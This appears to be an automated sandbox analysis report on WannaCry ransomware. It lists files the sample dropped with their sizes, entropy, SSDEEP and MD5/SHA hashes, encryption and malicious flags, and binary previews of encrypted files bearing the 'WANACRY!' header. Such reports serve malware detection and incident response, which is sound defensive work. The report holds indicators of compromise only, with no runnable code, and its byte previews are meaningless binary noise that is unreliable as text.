                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.239999967502925
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkERJWzYd8wr1xJB4dzenk8HUi7QujUN01kU3C5z9XLR9VHBsan9MkfXi:bkEsYBxPwWUYhk0ZC5z1LR9Ue9bS
                                                                              MD5:9880EC08AF54A8C83D72F40C5AF9AC7C
                                                                              SHA1:7C65ACB978203E990D5EE3604F1B3587FAB43F17
                                                                              SHA-256:882AEC0B0BCDCD04C2BB35586FFE566613B6AD31264B894F7CCC93D13E9D54EA
                                                                              SHA-512:3B913A5C2C4C44BFD3243A5386D8381E14829858CF81BB0308B72B9F382BDDF60FE109CD97BD5B3DB09D4006406F41B4CE271D124D08F30079A474FCAE812E63
                                                                              Malicious:false
                                                                              Preview:WANACRY!..../....,P..D.h.%.j.....n-m....[[I.x.9q..,....,..~%..............V..J..agb.))TF4.V...!'C*E.........0.H....".{.].(l...S..^...=/ \......A.B..qk......PM...K....q`R......1..t.....#l.)....(r9*.SY.37...........E.....A.+%..e..#...2l4.]...-....;.....{............C.gg.8.?...C.)&Q..k.JC.X/..&..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.239999967502925
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkERJWzYd8wr1xJB4dzenk8HUi7QujUN01kU3C5z9XLR9VHBsan9MkfXi:bkEsYBxPwWUYhk0ZC5z1LR9Ue9bS
                                                                              MD5:9880EC08AF54A8C83D72F40C5AF9AC7C
                                                                              SHA1:7C65ACB978203E990D5EE3604F1B3587FAB43F17
                                                                              SHA-256:882AEC0B0BCDCD04C2BB35586FFE566613B6AD31264B894F7CCC93D13E9D54EA
                                                                              SHA-512:3B913A5C2C4C44BFD3243A5386D8381E14829858CF81BB0308B72B9F382BDDF60FE109CD97BD5B3DB09D4006406F41B4CE271D124D08F30079A474FCAE812E63
                                                                              Malicious:false
                                                                              Preview:WANACRY!..../....,P..D.h.%.j.....n-m....[[I.x.9q..,....,..~%..............V..J..agb.))TF4.V...!'C*E.........0.H....".{.].(l...S..^...=/ \......A.B..qk......PM...K....q`R......1..t.....#l.)....(r9*.SY.37...........E.....A.+%..e..#...2l4.]...-....;.....{............C.gg.8.?...C.)&Q..k.JC.X/..&..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):29512
                                                                              Entropy (8bit):7.994679270504754
                                                                              Encrypted:true
                                                                              SSDEEP:768:L3jG2zhEVdSqGWKWoLXVHSSt0IW9V4Y8ztIZ1C/a:L3zElwW+MS6t1ca
                                                                              MD5:3F46E81B2B7DCBA71CE845BC913AF1F5
                                                                              SHA1:F69CE76CDF50DCED4A55F5A840A6B74942CE17A6
                                                                              SHA-256:96DE46A05916EE07D008863E4DAD49AF3A89992240ADF9E545F81123C8BBD168
                                                                              SHA-512:5B1E023F8DB6F6F6A5AFB0C53BB967FFB2227E6384AF45676EEE732760B682BE0806F52336401C91413FDAEB1B0F462BEEEE205407483A7468EB28F381765A2D
                                                                              Malicious:true
                                                                              Preview:WANACRY!....hE.......^.pp#...@....nZ4.8.....ba.[.P....Qn.=.Y......}G...F..R.Z..}\Z~.J.%......*.g(.Q.'.B_I..r.]...]9.F.j..z.:c.k..i.`BF(.2...h.|A...p./6..{)..Ym....a....h.=.....:[..+R...?.)J. ...OZ.&.....q^....._R......8.F.e?...>..o."'../.j`^.M2......A.5...9....0r........'.{..P......S.....r*......b.D...g...H"m....|.dF..U.BGM.......8o..Qs...R3E._.F....jHL.o.1L3.C.#Z..Wl.,......cn....q...PA[........A.I.!Y....)....uU\./..h.....#....P..U,.&M\..TXa..i.h.u.....64....=...8}..^-..ckS..o3..%.!+.X..5..D(.I.{..7.....OCz}....m..{TP...U.....Uw.'o!.X.1.q.!.....`;...vT.."..../.....f{.f-..w.'UG.,....U.]....:......N.Bv./.~~..H.k.(.>r......e.....-.=..*..oYA.3..!..A@[.,..b$ .k=.^.P...f...-../..e...].gx..^.C...5v .{..V....X~0!!....W......kd~Jf1........R........8..X.1.7.t.8......1.Z'.:.o..nm......;......S......c......@u.oZC...50..t{.q...l{.......W..He.6....6..jmp.HM..g..J..`{.]AUV.b4+46..-.C...mF...#jy..g[q%4.H...m.4.i.....t.j...w.Cbd.dn..-.u.?uAy.Q.LgD.......@Qn.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):29512
                                                                              Entropy (8bit):7.994679270504754
                                                                              Encrypted:true
                                                                              SSDEEP:768:L3jG2zhEVdSqGWKWoLXVHSSt0IW9V4Y8ztIZ1C/a:L3zElwW+MS6t1ca
                                                                              MD5:3F46E81B2B7DCBA71CE845BC913AF1F5
                                                                              SHA1:F69CE76CDF50DCED4A55F5A840A6B74942CE17A6
                                                                              SHA-256:96DE46A05916EE07D008863E4DAD49AF3A89992240ADF9E545F81123C8BBD168
                                                                              SHA-512:5B1E023F8DB6F6F6A5AFB0C53BB967FFB2227E6384AF45676EEE732760B682BE0806F52336401C91413FDAEB1B0F462BEEEE205407483A7468EB28F381765A2D
                                                                              Malicious:true
                                                                              Preview:WANACRY!....hE.......^.pp#...@....nZ4.8.....ba.[.P....Qn.=.Y......}G...F..R.Z..}\Z~.J.%......*.g(.Q.'.B_I..r.]...]9.F.j..z.:c.k..i.`BF(.2...h.|A...p./6..{)..Ym....a....h.=.....:[..+R...?.)J. ...OZ.&.....q^....._R......8.F.e?...>..o."'../.j`^.M2......A.5...9....0r........'.{..P......S.....r*......b.D...g...H"m....|.dF..U.BGM.......8o..Qs...R3E._.F....jHL.o.1L3.C.#Z..Wl.,......cn....q...PA[........A.I.!Y....)....uU\./..h.....#....P..U,.&M\..TXa..i.h.u.....64....=...8}..^-..ckS..o3..%.!+.X..5..D(.I.{..7.....OCz}....m..{TP...U.....Uw.'o!.X.1.q.!.....`;...vT.."..../.....f{.f-..w.'UG.,....U.]....:......N.Bv./.~~..H.k.(.>r......e.....-.=..*..oYA.3..!..A@[.,..b$ .k=.^.P...f...-../..e...].gx..^.C...5v .{..V....X~0!!....W......kd~Jf1........R........8..X.1.7.t.8......1.Z'.:.o..nm......;......S......c......@u.oZC...50..t{.q...l{.......W..He.6....6..jmp.HM..g..J..`{.]AUV.b4+46..-.C...mF...#jy..g[q%4.H...m.4.i.....t.j...w.Cbd.dn..-.u.?uAy.Q.LgD.......@Qn.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.204268647395173
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEnKwqxoIBOF76WWPRDHsaBzU6G+Vt34kcmQTMRl7tUe7Z5naQgF:bkEnKxoIBC76WWZbZg6G+jymQTMlvZZC
                                                                              MD5:CD40834907320F7D60BCB19AF2C85367
                                                                              SHA1:E3ABB9F82ABBC03A2C6E65571A6C991CF8BDB9EA
                                                                              SHA-256:88F2513B3184F1F055D5A01E32EBE09DE3A9F75B65ADBFC38ADD2DCB4A5019B2
                                                                              SHA-512:7C193460C4A3C3E83657F63173CB031767B8C6B4772390D88679907DEC07ED527D671BD33559628AC1C4C49CD6780B77C283787E15773036F5EEA44C1469D423
                                                                              Malicious:false
                                                                              Preview:WANACRY!......6..R.h;a....A.;b...g&S?_e..yr...9...b&eM.$S!..$..4;.....r...:.{.....mO.W...............`BU.3....Yr......D..t.[Q.u.g.DR...].~.m..y..N....oR4...*..g.V/.;.U..J|..'..RT.x@~.P..%&.....G0pz.[..~...^.1.3..x....).2.}..@..Q....N...g... ....z..Y..8_.......................$...:l..=+.H...H.}k...2...A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.204268647395173
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEnKwqxoIBOF76WWPRDHsaBzU6G+Vt34kcmQTMRl7tUe7Z5naQgF:bkEnKxoIBC76WWZbZg6G+jymQTMlvZZC
                                                                              MD5:CD40834907320F7D60BCB19AF2C85367
                                                                              SHA1:E3ABB9F82ABBC03A2C6E65571A6C991CF8BDB9EA
                                                                              SHA-256:88F2513B3184F1F055D5A01E32EBE09DE3A9F75B65ADBFC38ADD2DCB4A5019B2
                                                                              SHA-512:7C193460C4A3C3E83657F63173CB031767B8C6B4772390D88679907DEC07ED527D671BD33559628AC1C4C49CD6780B77C283787E15773036F5EEA44C1469D423
                                                                              Malicious:false
                                                                              Preview:WANACRY!......6..R.h;a....A.;b...g&S?_e..yr...9...b&eM.$S!..$..4;.....r...:.{.....mO.W...............`BU.3....Yr......D..t.[Q.u.g.DR...].~.m..y..N....oR4...*..g.V/.;.U..J|..'..RT.x@~.P..%&.....G0pz.[..~...^.1.3..x....).2.}..@..Q....N...g... ....z..Y..8_.......................$...:l..=+.H...H.}k...2...A
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.217998662980298
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEiCAGsLQ8zqc4gWxVzNBGXqtqLhrfSdQU8YKboJmSZ4:bkEiJGsrexVz+WwhrSSUxCaFC
                                                                              MD5:E5FD4CA700C094FC852BC97AF84B5DD6
                                                                              SHA1:6C87CA93982549A238F24C27DE8B6CD62A2B70BA
                                                                              SHA-256:211C373165D5FF7E5FD6E6F53181F4A355498CE713697B3D1DB6223B75896E32
                                                                              SHA-512:12050513EDD6BCBBD733CC0A5349F026B4624E6003E59C7C281C98E56ACD41726F73F547C925E66F7B874BA0BA751DD3B8E2DEA1D8BC89EF24BA2966195BE012
                                                                              Malicious:false
                                                                              Preview:WANACRY!............Q.!=.|]......O..>a.v..G*.....x-7h..Y..;.....*.m.X.s.....O.}..W.X......a(..]...H.y.%...)...9.#.QE%...././.$........%.c.Y.4\[....H{P.....6Rh..6....,d.h.p..FR(.=u.z0(h.Jv..#.).ut.x.t,....y.-..u...oj..8.<...x....\I..{..c..#.dO...O....f.....6............5$\v.J......./....z..0k......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.217998662980298
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEiCAGsLQ8zqc4gWxVzNBGXqtqLhrfSdQU8YKboJmSZ4:bkEiJGsrexVz+WwhrSSUxCaFC
                                                                              MD5:E5FD4CA700C094FC852BC97AF84B5DD6
                                                                              SHA1:6C87CA93982549A238F24C27DE8B6CD62A2B70BA
                                                                              SHA-256:211C373165D5FF7E5FD6E6F53181F4A355498CE713697B3D1DB6223B75896E32
                                                                              SHA-512:12050513EDD6BCBBD733CC0A5349F026B4624E6003E59C7C281C98E56ACD41726F73F547C925E66F7B874BA0BA751DD3B8E2DEA1D8BC89EF24BA2966195BE012
                                                                              Malicious:false
                                                                              Preview:WANACRY!............Q.!=.|]......O..>a.v..G*.....x-7h..Y..;.....*.m.X.s.....O.}..W.X......a(..]...H.y.%...)...9.#.QE%...././.$........%.c.Y.4\[....H{P.....6Rh..6....,d.h.p..FR(.=u.z0(h.Jv..#.).ut.x.t,....y.-..u...oj..8.<...x....\I..{..c..#.dO...O....f.....6............5$\v.J......./....z..0k......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.200339127710021
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEsmwtKgKzsOqoig5ulH50HXbEZ1UyRPkpoCy688UjimmlKOvMC2:bkEatmTig5K5iEZ1UjpoCS8UjQlKcMC2
                                                                              MD5:A01D412C7250D5EAC4D537E8006215DF
                                                                              SHA1:8D96039A7EEE697D579DAFDE0488A3A1B48F7BB3
                                                                              SHA-256:84E5042F965528B9DDCA22493EB70AD24150CB10B23C7090ED73D6E95D7D2A33
                                                                              SHA-512:D4CCD0120748039C2A50F7A6484271C0D32D46BF97FD39099D21B6983251B78AED04742EF016033D8E8D3CE33251B1B864830EE3D68260E878B77CCBBD4D5ED6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....m!..o14.x..IR..E.}.^3.H.&z.<h'...e..I)...4[c.l)V.y.L..y...8.Qw...=xm..V.....|9E.`.t.K.g..P......o.......B#.f.T..N.U...'q...i...VZpy.fy..77...s...#q'.j.?...3+q...,..4..F#.bX.pu8...m1.}D..gs...]...t....&u....i.I.N.......t....R........3.m.W.d...$............G.z..X=Z....<<.n'c>...T..ix..j
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):312
                                                                              Entropy (8bit):7.200339127710021
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEsmwtKgKzsOqoig5ulH50HXbEZ1UyRPkpoCy688UjimmlKOvMC2:bkEatmTig5K5iEZ1UjpoCS8UjQlKcMC2
                                                                              MD5:A01D412C7250D5EAC4D537E8006215DF
                                                                              SHA1:8D96039A7EEE697D579DAFDE0488A3A1B48F7BB3
                                                                              SHA-256:84E5042F965528B9DDCA22493EB70AD24150CB10B23C7090ED73D6E95D7D2A33
                                                                              SHA-512:D4CCD0120748039C2A50F7A6484271C0D32D46BF97FD39099D21B6983251B78AED04742EF016033D8E8D3CE33251B1B864830EE3D68260E878B77CCBBD4D5ED6
                                                                              Malicious:false
                                                                              Preview:WANACRY!....m!..o14.x..IR..E.}.^3.H.&z.<h'...e..I)...4[c.l)V.y.L..y...8.Qw...=xm..V.....|9E.`.t.K.g..P......o.......B#.f.T..N.U...'q...i...VZpy.fy..77...s...#q'.j.?...3+q...,..4..F#.bX.pu8...m1.}D..gs...]...t....&u....i.I.N.......t....R........3.m.W.d...$............G.z..X=Z....<<.n'c>...T..ix..j
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.2388340012734815
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEogAyCuxTOhpulW330GqslZ9s6OxpAiJiHknqEjOip2CwAwRygHd:bkEoTyC+ihMgxD9s70HmqECip2L9
                                                                              MD5:3C7646D2AB22DB210688AE725367C196
                                                                              SHA1:CE56200B4AAD91CE6357F76AF2417F872B1FB36E
                                                                              SHA-256:3D4A50649342EFB2F3C746E9B0A660B4893B1F14FA97C5238616CB59BDC8E4EB
                                                                              SHA-512:F893AD93E9532412C9B025AB2EBF964444027688841C65D0EE13E9B812CEE20A21A38FF3BFD31FEF04D748A9B13C61FFA031E25BE9F3A60C7FDD2435CF8F5E2F
                                                                              Malicious:false
                                                                              Preview:WANACRY!....v....$.!.........mb..E....^.$.(8>..~.,;.......r...Q..).y..d.+..W..d.#.....q....i.....&.%.;......4..x(V.yB.P#0q.ft.`(......TH..Z.G......^*....ypbN.3|.}_...xf..B.q... .L%GV-..y.b.h.5...:h.>......3........s.}.....j.].znId..:......h. ....?C1............x."5aU..4C..f..x
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.2388340012734815
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEogAyCuxTOhpulW330GqslZ9s6OxpAiJiHknqEjOip2CwAwRygHd:bkEoTyC+ihMgxD9s70HmqECip2L9
                                                                              MD5:3C7646D2AB22DB210688AE725367C196
                                                                              SHA1:CE56200B4AAD91CE6357F76AF2417F872B1FB36E
                                                                              SHA-256:3D4A50649342EFB2F3C746E9B0A660B4893B1F14FA97C5238616CB59BDC8E4EB
                                                                              SHA-512:F893AD93E9532412C9B025AB2EBF964444027688841C65D0EE13E9B812CEE20A21A38FF3BFD31FEF04D748A9B13C61FFA031E25BE9F3A60C7FDD2435CF8F5E2F
                                                                              Malicious:false
                                                                              Preview:WANACRY!....v....$.!.........mb..E....^.$.(8>..~.,;.......r...Q..).y..d.+..W..d.#.....q....i.....&.%.;......4..x(V.yB.P#0q.ft.`(......TH..Z.G......^*....ypbN.3|.}_...xf..B.q... .L%GV-..y.b.h.5...:h.>......3........s.}.....j.].znId..:......h. ....?C1............x."5aU..4C..f..x
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1176
                                                                              Entropy (8bit):7.814857629481966
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkE/3vtP9YCrcSXJKFvsK51F4JTpjnHR8h42alOEFVfTJT2qGVe:bkgvjxrcfz34JTNnHxbU8JTHGVe
                                                                              MD5:DD477114A7D89A04829CFD371A99E0AF
                                                                              SHA1:C03B14CBC146EEA6113ACAA571C4E8E66B0BEBC4
                                                                              SHA-256:2CD59D7DFB92E43448B46BD889F156F291CFAB5F4A4CC9503438674D17622899
                                                                              SHA-512:767A9ABEB60A3358528D55F60B153DFDB814D4F2F0B974131312EBD669B9A4C063E4B87174275CCC6A57E754B212FFEC5EE2D497AF9F067C491C0C1ECF47DFB2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....`.4^....|J........t."L.ofcz0:.Q..@.@.&..}..,h8_a.k....+.....tVzN.N....@!.k.u..+R..a.~.y..U....n...WM...n0 n.L.......P...G}.(.......m#.....rc...J.v&....L.................i....l......WN..;;%.....4..,N.H._...>...d..8..;.F...d{+..2^...:?.,D.... .1....q..........S.....9Y....*%...T......W<.q....N..h....)...7x..J.xi....73'-....F....Jg...?<.x..>...4..L)J..p..(.r..It..G...s3...x..6.s...l..S.N.(....aQsv...W.IU).(,.Vl'..u...&;z.>S2s..,K...s..3.I....L.].....8$l.i....S.?..Z.+.....x...;.,w..E.U\5...B...J=1a.K&..o....M...;0.....?..m..~.......M..nm..)...TM.~...^-..Z8?.,F....^.'.d..A....=v5..h.Id./..x!'..[..O...\.........?.P.`.ZfR..L.mwG....$...e4P....?[.Q..{O.h.s.I.S..M...U.O....K.fh...7.?.-......~..{...u.6..9".4y..T.|..I.L..?..E.-...4..S..p.2.=nJ...!.0.[....Q.O.1iu..b|z.S.....h65...E.....O_.,....#...r.......a..o2I...M....C...!.Oj.Up.m.\.f.b...~ .)+.0G..`<n.e...,T7.........}."5..S....0.b....V{.s..~>=..O.c..;.._._........9..F.\.2LHiv.sx.3Q.x..H......J\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1176
                                                                              Entropy (8bit):7.814857629481966
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkE/3vtP9YCrcSXJKFvsK51F4JTpjnHR8h42alOEFVfTJT2qGVe:bkgvjxrcfz34JTNnHxbU8JTHGVe
                                                                              MD5:DD477114A7D89A04829CFD371A99E0AF
                                                                              SHA1:C03B14CBC146EEA6113ACAA571C4E8E66B0BEBC4
                                                                              SHA-256:2CD59D7DFB92E43448B46BD889F156F291CFAB5F4A4CC9503438674D17622899
                                                                              SHA-512:767A9ABEB60A3358528D55F60B153DFDB814D4F2F0B974131312EBD669B9A4C063E4B87174275CCC6A57E754B212FFEC5EE2D497AF9F067C491C0C1ECF47DFB2
                                                                              Malicious:false
                                                                              Preview:WANACRY!....`.4^....|J........t."L.ofcz0:.Q..@.@.&..}..,h8_a.k....+.....tVzN.N....@!.k.u..+R..a.~.y..U....n...WM...n0 n.L.......P...G}.(.......m#.....rc...J.v&....L.................i....l......WN..;;%.....4..,N.H._...>...d..8..;.F...d{+..2^...:?.,D.... .1....q..........S.....9Y....*%...T......W<.q....N..h....)...7x..J.xi....73'-....F....Jg...?<.x..>...4..L)J..p..(.r..It..G...s3...x..6.s...l..S.N.(....aQsv...W.IU).(,.Vl'..u...&;z.>S2s..,K...s..3.I....L.].....8$l.i....S.?..Z.+.....x...;.,w..E.U\5...B...J=1a.K&..o....M...;0.....?..m..~.......M..nm..)...TM.~...^-..Z8?.,F....^.'.d..A....=v5..h.Id./..x!'..[..O...\.........?.P.`.ZfR..L.mwG....$...e4P....?[.Q..{O.h.s.I.S..M...U.O....K.fh...7.?.-......~..{...u.6..9".4y..T.|..I.L..?..E.-...4..S..p.2.=nJ...!.0.[....Q.O.1iu..b|z.S.....h65...E.....O_.,....#...r.......a..o2I...M....C...!.Oj.Up.m.\.f.b...~ .)+.0G..`<n.e...,T7.........}."5..S....0.b....V{.s..~>=..O.c..;.._._........9..F.\.2LHiv.sx.3Q.x..H......J\
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.107816901616568
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEXO5p13+uQ3rSmlSZoklo/Bq/Ln9+KBoYr4eY8SDZUxEuKr07qNg5:bkEXaCurm+oB/BEzPse7SD+xU0715
                                                                              MD5:957D8FBB820292D63CCD311E227B9791
                                                                              SHA1:CBDD63C30D1A4B9DEE9FF2A71FE2CF743CADA1DD
                                                                              SHA-256:3C98ACCDC365D469CB8915BB095946C8BCAB69A43F3063C21D287B31BE66CB81
                                                                              SHA-512:A7EA16370BA6CA6588B01F97F3B3C7A0E7E101EBE56AA35D83874F0AF06001B08D4404EF4989487695262C4D18CDE8EC81316CD44861E8BF7D6992AC45966961
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....(.?T.....Bs../.?_._.0%g...@.....XP.f;~..C..?...cj...*.`.k..?e&..$..K.qAU:b&.k.7..xB7n..lK..1...FC...M.....J.+...f..._._.o.\..aq.........P...d...P>.Q.n4..8..<a:r.T../.o...V.ASb|g..AW.&X.P..G;..v-.=.X..Hv..&...X..mlP%..^.H.40....m.%Q,._?.O0.$.K...............a..6K.xP...|i.S.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):296
                                                                              Entropy (8bit):7.107816901616568
                                                                              Encrypted:false
                                                                              SSDEEP:6:bkEXO5p13+uQ3rSmlSZoklo/Bq/Ln9+KBoYr4eY8SDZUxEuKr07qNg5:bkEXaCurm+oB/BEzPse7SD+xU0715
                                                                              MD5:957D8FBB820292D63CCD311E227B9791
                                                                              SHA1:CBDD63C30D1A4B9DEE9FF2A71FE2CF743CADA1DD
                                                                              SHA-256:3C98ACCDC365D469CB8915BB095946C8BCAB69A43F3063C21D287B31BE66CB81
                                                                              SHA-512:A7EA16370BA6CA6588B01F97F3B3C7A0E7E101EBE56AA35D83874F0AF06001B08D4404EF4989487695262C4D18CDE8EC81316CD44861E8BF7D6992AC45966961
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....(.?T.....Bs../.?_._.0%g...@.....XP.f;~..C..?...cj...*.`.k..?e&..$..K.qAU:b&.k.7..xB7n..lK..1...FC...M.....J.+...f..._._.o.\..aq.........P...d...P>.Q.n4..8..<a:r.T../.o...V.ASb|g..AW.&X.P..G;..v-.=.X..Hv..&...X..mlP%..^.H.40....m.%Q,._?.O0.$.K...............a..6K.xP...|i.S.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):190440
                                                                              Entropy (8bit):7.999100316591728
                                                                              Encrypted:true
                                                                              SSDEEP:3072:CgpcBvpm1rNULg7K0azJtTrFQefAIhkUblBn1UKnveRg16/xBWphbDqnYfZbcAxg:CgpMGrG07K0azLrD1RR6/W+nocW832bk
                                                                              MD5:936CB24554FC27A2DDAAF0B588750EA6
                                                                              SHA1:16B8A13AF2F46E1AA65294E78AE1D08B0BC6118B
                                                                              SHA-256:B0008DEDD2403F68260050124DDF023294A1D2EFEC5476D7CB0DEF68ADA920ED
                                                                              SHA-512:BAE3469C21D4E0E8EDB1BD2E86DE88781C599910CC326E5C39C177A6B875C0FB3C7477CB170B0F0F2B640703AB5B459979AC2704D7C579D17699079E4DD0C506
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........sNQ...&...K..S...].w.>..t..QD....'|.;...:..I...V..G3V.$C..c.......%.5.|.8]...k..f....3.oV?....%.......mXm.l...=[.F.t?.Ya.(.NN.#..............q.1Z.V......,,.D.>.8[..b......r.E.T....s......Ny.D)........ .....%.I..l.K.gj.x.k.F..q...................*6m.....J{._=........Y..........~&..&...;..u`*...\r..g..8H......0$@..P.R....Eq....r...|9.U.Q...[..c'..~..B.b6;..o....C..]p.]'.~l...l..l.o.:..x...Ne\.=.w....GV.Kt.f{.B......(.......i.....b..Y:=....c....R/..t.._.f$..X..V.*..5(...n.*A. ...G.s..l?....>...(...`.=..I_...WAsR......~....=..@W..Q.v...T...=,8 ..&...D..5..S.E...]..X.'.b.....^,.1.$......./gp.Y..$...`... ...F%.?U...J{Bi..K2-....]C.ErxI.<z..t...X2 ..g:...i*.R{.kn.^.....(..%*...e.iO/..^.....n..|.oJ4..g..].3bC@..U..0c..X...~.6.4O9...$....--+.3.X=....^.6q.#CD.c..B\5...t...S..'.K....'+|..H..A%.eP0.._..F....y...<.wr%.2...c.Q...T.La7....,t.......".7.....h...^...W.n.x...r...|...r....<...5....yJ.^..G.1.9....}U\.B}..*.....7..!qN...-$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):190440
                                                                              Entropy (8bit):7.999100316591728
                                                                              Encrypted:true
                                                                              SSDEEP:3072:CgpcBvpm1rNULg7K0azJtTrFQefAIhkUblBn1UKnveRg16/xBWphbDqnYfZbcAxg:CgpMGrG07K0azLrD1RR6/W+nocW832bk
                                                                              MD5:936CB24554FC27A2DDAAF0B588750EA6
                                                                              SHA1:16B8A13AF2F46E1AA65294E78AE1D08B0BC6118B
                                                                              SHA-256:B0008DEDD2403F68260050124DDF023294A1D2EFEC5476D7CB0DEF68ADA920ED
                                                                              SHA-512:BAE3469C21D4E0E8EDB1BD2E86DE88781C599910CC326E5C39C177A6B875C0FB3C7477CB170B0F0F2B640703AB5B459979AC2704D7C579D17699079E4DD0C506
                                                                              Malicious:true
                                                                              Preview:WANACRY!.........sNQ...&...K..S...].w.>..t..QD....'|.;...:..I...V..G3V.$C..c.......%.5.|.8]...k..f....3.oV?....%.......mXm.l...=[.F.t?.Ya.(.NN.#..............q.1Z.V......,,.D.>.8[..b......r.E.T....s......Ny.D)........ .....%.I..l.K.gj.x.k.F..q...................*6m.....J{._=........Y..........~&..&...;..u`*...\r..g..8H......0$@..P.R....Eq....r...|9.U.Q...[..c'..~..B.b6;..o....C..]p.]'.~l...l..l.o.:..x...Ne\.=.w....GV.Kt.f{.B......(.......i.....b..Y:=....c....R/..t.._.f$..X..V.*..5(...n.*A. ...G.s..l?....>...(...`.=..I_...WAsR......~....=..@W..Q.v...T...=,8 ..&...D..5..S.E...]..X.'.b.....^,.1.$......./gp.Y..$...`... ...F%.?U...J{Bi..K2-....]C.ErxI.<z..t...X2 ..g:...i*.R{.kn.^.....(..%*...e.iO/..^.....n..|.oJ4..g..].3bC@..U..0c..X...~.6.4O9...$....--+.3.X=....^.6q.#CD.c..B\5...t...S..'.K....'+|..H..A%.eP0.._..F....y...<.wr%.2...c.Q...T.La7....,t.......".7.....h...^...W.n.x...r...|...r....<...5....yJ.^..G.1.9....}U\.B}..*.....7..!qN...-$
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):416088
                                                                              Entropy (8bit):7.9996080281300745
                                                                              Encrypted:true
                                                                              SSDEEP:6144:poQtOCW8J8ChvEi+xmHdY79RMKEsakLatQtdyA0g0K9as4RRNbB+7+Qpb8C3:Je2vEvxWY0JkLaejEg0KUsULB+iQJ84
                                                                              MD5:C3998F497A18DD05B450F6275BAEFC7E
                                                                              SHA1:683461F65BF33D9491888C06F7C773F37473B0B6
                                                                              SHA-256:E86F71621638182FEF2EF7E5F92AF56B944F6FB889C5F542C8BD9148A7BBE1C2
                                                                              SHA-512:864818F50728858634E9222CF88D5A2B88BCBAD6FB541EBC3683AA7DE72775EBA19CA59888E7AB0F26220228695AD9763B9975BABA34EC10E146991AE82DE7BA
                                                                              Malicious:true
